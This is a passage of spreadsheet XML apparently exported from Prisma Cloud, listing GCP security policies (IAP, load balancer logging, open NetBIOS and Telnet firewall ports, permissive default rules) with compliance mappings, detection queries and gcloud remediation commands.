      <c r="AD2703" t="b">
        <v>1</v>
      </c>
      <c r="AE2703" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2703" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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3" t="inlineStr">
        <is>
          <t>254da1e9-9d2b-4f76-9d47-c37481629402</t>
        </is>
      </c>
      <c r="AI2703" t="inlineStr">
        <is>
          <t>121b6286-8fbf-4a5f-90d8-75b3f36b88a5</t>
        </is>
      </c>
      <c r="AJ2703" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2703" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2704">
      <c r="A2704" t="inlineStr">
        <is>
          <t>Risk Management in Technology (RMiT), Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5, ISO/IEC 27001:2022, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B2704" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2704" s="2" t="inlineStr"/>
      <c r="D2704" t="inlineStr"/>
      <c r="E2704" t="inlineStr"/>
      <c r="F2704" t="inlineStr"/>
      <c r="G2704" t="b">
        <v>1</v>
      </c>
      <c r="H27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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2704" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2704" t="inlineStr">
        <is>
          <t>GCP Identity-Aware Proxy (IAP) not enabled for External HTTP(s) Load Balancer</t>
        </is>
      </c>
      <c r="L2704" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2704" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2704" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2704" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2704" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2704" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2704" t="inlineStr">
        <is>
          <t>SC-08-00 : Transmission Confidentiality and Integrity</t>
        </is>
      </c>
      <c r="S2704" t="inlineStr"/>
      <c r="T2704" t="b">
        <v>0</v>
      </c>
      <c r="U2704" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2704" t="inlineStr">
        <is>
          <t>gcloud-compute-external-backend-service</t>
        </is>
      </c>
      <c r="W2704" t="inlineStr">
        <is>
          <t>This policy identifies GCP External HTTP(s) Load Balancers for which Identity-Aware Proxy(IAP) is disabled.  IAP is used to enforce access control policies for applications and resources. It works with signed headers or the App Engine standard environment Users API to secure connections to External HTTP(s) Load Balancers. It is recommended to enable Identity-Aware Proxy for securing the External HTTP(s) Load Balancers.
Reference: https://cloud.google.com/iap/docs/concepts-overview</t>
        </is>
      </c>
      <c r="X2704" t="inlineStr">
        <is>
          <t>Follow the below mentioned URL to enable IAP on the external HTTP(S) load balancer:
https://cloud.google.com/iap/docs/load-balancer-howto#enable-iap</t>
        </is>
      </c>
      <c r="Y2704" t="inlineStr"/>
      <c r="Z2704" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-external-backend-service' AND json.rule = iap does not exist or iap.enabled equals "false"</t>
        </is>
      </c>
      <c r="AA2704" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2704" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2704" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-945</t>
        </is>
      </c>
      <c r="AD2704" t="b">
        <v>1</v>
      </c>
      <c r="AE2704" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2704" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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4" t="inlineStr">
        <is>
          <t>792c1e8d-f8aa-4fc5-a036-3d55ccbb27a2</t>
        </is>
      </c>
      <c r="AI2704" t="inlineStr">
        <is>
          <t>da73f5e7-c8ab-4b16-ae99-04717af0123b</t>
        </is>
      </c>
      <c r="AJ2704" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2704" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2705">
      <c r="A2705" t="inlineStr">
        <is>
          <t>ITSG-33, CIS v3.0.0 (GCP) Level 2, NYDFS 23 CRR-NY 500.0, CIS v2.0.0 (GCP) Level 2, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, TX-RAMP Level 1, TX-RAMP Level 2, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, SOC 2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B2705" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2705" s="2" t="inlineStr"/>
      <c r="D2705" t="inlineStr"/>
      <c r="E2705" t="inlineStr"/>
      <c r="F2705" t="inlineStr"/>
      <c r="G2705" t="b">
        <v>1</v>
      </c>
      <c r="H27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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2705" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2705" t="inlineStr">
        <is>
          <t>GCP External Load Balancer logging is disabled</t>
        </is>
      </c>
      <c r="L2705" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2705" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2705" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2705" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2705" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2705" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R2705" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S2705" t="inlineStr"/>
      <c r="T2705" t="b">
        <v>0</v>
      </c>
      <c r="U2705" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2705" t="inlineStr">
        <is>
          <t>gcloud-compute-external-backend-service</t>
        </is>
      </c>
      <c r="W2705" t="inlineStr">
        <is>
          <t>This policy identifies GCP External Load Balancers using any of the protocols like HTTP, HTTPS, and HTTP/2 having logging disabled. 
GCP external load balancers distribute incoming traffic across multiple instances or services hosted on Google Cloud Platform. Feature \"logging\" for external load balancers captures and records detailed information about the traffic flowing through the load balancers. This includes data such as incoming requests, responses, errors, latency metrics, and other relevant information.  By enabling logging for external load balancers, you gain visibility into the performance, health, and security of the applications. Logged data comes handy for troubleshooting an incident, monitoring, analysis, and compliance purposes. 
It is recommended to enable logging for all external load balancers.</t>
        </is>
      </c>
      <c r="X2705" t="inlineStr">
        <is>
          <t>1. Log in to the GCP console.
2. Navigate to 'Network Services' and select 'Load Balancing' from the left panel.
3. Click on 'BACKENDS'.
4. Click on the load balancer link under the 'Load balancer' column for the reported backend service.
5. On the Load Balancer details page, click on 'EDIT'.
6. Click on 'Backend configuration', and then click the edit icon next to the reported backend service under the 'Backend services' section.
7. Under 'Logging', select 'Enable logging' checkbox.
8. Choose the appropriate Sample rate.
9. To finish editing the backend service, click 'UPDATE'.
10. To finish editing the load balancer, click 'UPDATE'.</t>
        </is>
      </c>
      <c r="Y2705" t="inlineStr"/>
      <c r="Z2705" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-external-backend-service' AND json.rule = backends exists and ( protocol equal ignore case "HTTP" or protocol equal ignore case "HTTPS" or protocol equal ignore case "HTTP2" ) and ( logConfig.enable does not exist or logConfig.enable is false )</t>
        </is>
      </c>
      <c r="AA2705" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2705" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2705" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-1143</t>
        </is>
      </c>
      <c r="AD2705" t="b">
        <v>1</v>
      </c>
      <c r="AE2705" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2705" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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5" t="inlineStr">
        <is>
          <t>b84d0b24-ebc1-42ac-bdf5-7ad58cf74f22</t>
        </is>
      </c>
      <c r="AI2705" t="inlineStr">
        <is>
          <t>ab0e7fd6-c748-4e91-9c12-6ebbdcdee66f</t>
        </is>
      </c>
      <c r="AJ2705" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2705" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2706">
      <c r="A2706" t="inlineStr">
        <is>
          <t>CIS v1.3.0 (GCP)</t>
        </is>
      </c>
      <c r="B2706" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2706" s="2" t="inlineStr"/>
      <c r="D2706" t="inlineStr"/>
      <c r="E2706" t="inlineStr"/>
      <c r="F2706" t="inlineStr"/>
      <c r="G2706" t="b">
        <v>0</v>
      </c>
      <c r="H27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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2706" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2706" t="inlineStr">
        <is>
          <t>Test3-Demo</t>
        </is>
      </c>
      <c r="L2706" t="inlineStr"/>
      <c r="M2706" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2706" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2706" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2706" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2706" t="inlineStr">
        <is>
          <t>Logging and Monitoring</t>
        </is>
      </c>
      <c r="R2706" t="inlineStr">
        <is>
          <t>2.1</t>
        </is>
      </c>
      <c r="S2706" t="inlineStr"/>
      <c r="T2706" t="b">
        <v>0</v>
      </c>
      <c r="U2706" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2706" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2706" t="inlineStr"/>
      <c r="X2706" t="inlineStr"/>
      <c r="Y2706" t="inlineStr"/>
      <c r="Z2706"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_Port.inRange(62000,6400) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists</t>
        </is>
      </c>
      <c r="AA2706" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2706" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2706" t="inlineStr"/>
      <c r="AD2706" t="b">
        <v>0</v>
      </c>
      <c r="AE2706" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2706" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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6" t="inlineStr">
        <is>
          <t>15417ca7-4030-47e1-a0c3-388d604aa07b</t>
        </is>
      </c>
      <c r="AI2706" t="inlineStr">
        <is>
          <t>ad7792cf-da3e-4a89-99d7-84983c64bc8b</t>
        </is>
      </c>
      <c r="AJ2706" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2706" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2707">
      <c r="A2707" t="inlineStr">
        <is>
          <t>Fedramp (Moderate)</t>
        </is>
      </c>
      <c r="B2707" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2707" s="2" t="inlineStr"/>
      <c r="D2707" t="inlineStr"/>
      <c r="E2707" t="inlineStr"/>
      <c r="F2707" t="inlineStr"/>
      <c r="G2707" t="b">
        <v>1</v>
      </c>
      <c r="H27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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2707" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2707" t="inlineStr">
        <is>
          <t>Test-Port-Scan</t>
        </is>
      </c>
      <c r="L2707" t="inlineStr"/>
      <c r="M2707" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2707" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2707" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2707" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2707" t="inlineStr">
        <is>
          <t>MA</t>
        </is>
      </c>
      <c r="R2707" t="inlineStr">
        <is>
          <t>MA-03 (01)</t>
        </is>
      </c>
      <c r="S2707" t="inlineStr"/>
      <c r="T2707" t="b">
        <v>0</v>
      </c>
      <c r="U2707" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2707" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2707" t="inlineStr">
        <is>
          <t>Look for suspicious port scans for a specific range</t>
        </is>
      </c>
      <c r="X2707" t="inlineStr"/>
      <c r="Y2707" t="inlineStr"/>
      <c r="Z2707"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_Port.inRange(62000,6400) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists</t>
        </is>
      </c>
      <c r="AA2707" t="inlineStr">
        <is>
          <t>Tunde Adenugba</t>
        </is>
      </c>
      <c r="AB2707" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2707" t="inlineStr"/>
      <c r="AD2707" t="b">
        <v>0</v>
      </c>
      <c r="AE2707" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2707" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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7" t="inlineStr">
        <is>
          <t>466ad58a-b1fa-4afe-b15b-8b2f132d8f0b</t>
        </is>
      </c>
      <c r="AI2707" t="inlineStr">
        <is>
          <t>f1fae0a0-91e4-4e90-8b39-69716e2a7900</t>
        </is>
      </c>
      <c r="AJ2707" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2707" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2708">
      <c r="A2708" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02,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Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CSA CCM v.4.0.6, CIS Controls v7.1, SOC 2, ISO 27001:2013, NIST SP 800-172, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, PCI DSS v4.0, MPAA Content Protection Best Practices, NIST CSF, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated], jbrox - GDPR, kashan ACSC Information Security Manual (ISM), ISO 27001:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MPAA Content Protection Best Practices, NIST CSF, jbrox - GDPR, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, Copy of CIS Controls v8, CSA CCM v3.0.1, NIST SP 800-171 Revision 3, ITSG-33, Copy of New Zealand Information Security Manual (NZISM v3.4), CRI Profile v2.0,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CSA CCM v3.0.1, NIST SP 800-171 Revision 2, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2708" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2708" s="2" t="inlineStr"/>
      <c r="D2708" t="inlineStr"/>
      <c r="E2708" t="inlineStr"/>
      <c r="F2708" t="inlineStr"/>
      <c r="G2708" t="b">
        <v>1</v>
      </c>
      <c r="H27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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2708" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2708" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on NetBIOS-SSN port (139)</t>
        </is>
      </c>
      <c r="L2708" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2708" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2708" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2708" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2708" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2708" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2708" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2708" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2708" t="b">
        <v>1</v>
      </c>
      <c r="U2708" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2708" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2708" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on NetBIOS-SSN port (139). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the NetBIOS-SSN port (139) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2708"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08" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to NetBIOS-SSN port (139).",
'impact': 'Disable GCP Firewall rule which allows all traffic on NetBIOS-SSN port (139)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2708"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_Port.inRange(139,139) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists</t>
        </is>
      </c>
      <c r="AA2708" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2708" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2708" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-74</t>
        </is>
      </c>
      <c r="AD2708" t="b">
        <v>1</v>
      </c>
      <c r="AE2708" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2708" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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8" t="inlineStr">
        <is>
          <t>7afdb939-4a9a-45b0-ba3b-f81dec86bc76</t>
        </is>
      </c>
      <c r="AI2708" t="inlineStr">
        <is>
          <t>7afdb939-4a9a-45b0-ba3b-f81dec86bc76</t>
        </is>
      </c>
      <c r="AJ2708" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2708" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2709">
      <c r="A2709" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, NIST CSF v2.0, kashan ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.1.02, ACSC Information Security Manual (ISM), NIST SP 800-172, ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), Risk Management in Technology (RMiT), kfirdaus AWS Account-CS, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, GDPR, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev 5, CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, SOC 2, CIS Controls v7.1, PCI DSS v3.2.1, MITRE ATT&amp;CK v8.2 [Deprecated], CIS Controls v7.1, SOC 2, ISO 27001:2013, HITRUST CSF v.11.2.0, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, NIST CSF, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, PCI DSS v4.0, SOC 2, jbrox - GDPR, kashan ACSC Information Security Manual (ISM), ISO 27001:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated], jbrox - GDPR, SOC 2, PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, Copy of CIS Controls v8, CSA CCM v3.0.1, NIST SP 800-171 Revision 3, Copy of New Zealand Information Security Manual (NZISM v3.4), RBI Baseline Cyber Security and Resilience Requirements, TX-RAMP Level 1, GDPR, SOC 2, FFIEC, ISO 27001:2013, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CSA CCM v3.0.1, kashan ACSC Information Security Manual (ISM), CCPA 2018, PIPEDA, NIST CSF, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, NIST SP 800-172, CSA CCM v3.0.1, NIST SP 800-171 Revision 2, PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated], CRI Profile v2.0</t>
        </is>
      </c>
      <c r="B2709" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2709" s="2" t="inlineStr"/>
      <c r="D2709" t="inlineStr"/>
      <c r="E2709" t="inlineStr"/>
      <c r="F2709" t="inlineStr"/>
      <c r="G2709" t="b">
        <v>1</v>
      </c>
      <c r="H27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09" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2709" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2709" t="inlineStr">
        <is>
          <t>GCP Default Firewall rule is overly permissive (except http and https)</t>
        </is>
      </c>
      <c r="L2709" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2709" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2709" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2709" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2709" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2709" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2709" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2709" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2709" t="b">
        <v>1</v>
      </c>
      <c r="U2709" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2709" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2709" t="inlineStr">
        <is>
          <t>This policy identifies the Firewall rules that are configured with default firewall rule. The default Firewall rules will apply to all instances by default in the absence of specific custom rules with higher priority. It is a safe practice to not have these rules in the default Firewall.</t>
        </is>
      </c>
      <c r="X2709" t="inlineStr">
        <is>
          <t>1. Login to GCP Console
2. Navigate to 'VPC network' Under service 'NETWORKING'
3. Click on section 'Firewall' on left panel
4. For 'default' rule, apply filter 'Name : default-',
5. select all the rules which start with 'default-' (except http, https) and click on 'DELETE' icon
6. On pop-up window, click on 'DELETE'</t>
        </is>
      </c>
      <c r="Y2709" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable default Firewall rule which is overly permissive (except http and https).",
'impact': 'Disable GCP Default Firewall rule which is overly permissive (except http and https)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2709" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name= 'gcloud-compute-firewall-rules-list' AND json.rule = 'disabled is false and (name equals default-allow-ssh or name equals default-allow-icmp or name equals default-allow-internal or name equals default-allow-rdp) and (deleted is false) and (sourceRanges[*] contains 0.0.0.0/0 or sourceRanges[*] contains ::/0)'</t>
        </is>
      </c>
      <c r="AA2709" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2709" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2709" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-86</t>
        </is>
      </c>
      <c r="AD2709" t="b">
        <v>1</v>
      </c>
      <c r="AE2709" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2709" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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09" t="inlineStr">
        <is>
          <t>3b814978-44a0-4a5b-9736-492d67ee4994</t>
        </is>
      </c>
      <c r="AI2709" t="inlineStr">
        <is>
          <t>a1d88a90-aede-4678-8e01-6cc08074bcf5</t>
        </is>
      </c>
      <c r="AJ2709" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2709" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2710">
      <c r="A2710"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MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, TX-RAMP Level 1, Copy of ACSC Information Security Manual (ISM)-clone, SOC 2, CIS Controls v7.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CIS Controls v7.1, SOC 2, ISO 27001:2013, NIST SP 800-172, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), MPAA Content Protection Best Practices, NIST CSF, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0,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MITRE ATT&amp;CK v6.3 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, GDPR, SOC 2, FFIEC, TX-RAMP Level 2,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PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2710" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2710" s="2" t="inlineStr"/>
      <c r="D2710" t="inlineStr"/>
      <c r="E2710" t="inlineStr"/>
      <c r="F2710" t="inlineStr"/>
      <c r="G2710" t="b">
        <v>1</v>
      </c>
      <c r="H27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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2710" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2710" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on Telnet port (23)</t>
        </is>
      </c>
      <c r="L2710" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2710" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2710" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2710" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2710" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2710" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2710" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2710" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2710" t="b">
        <v>1</v>
      </c>
      <c r="U2710" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2710" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2710" t="inlineStr">
        <is>
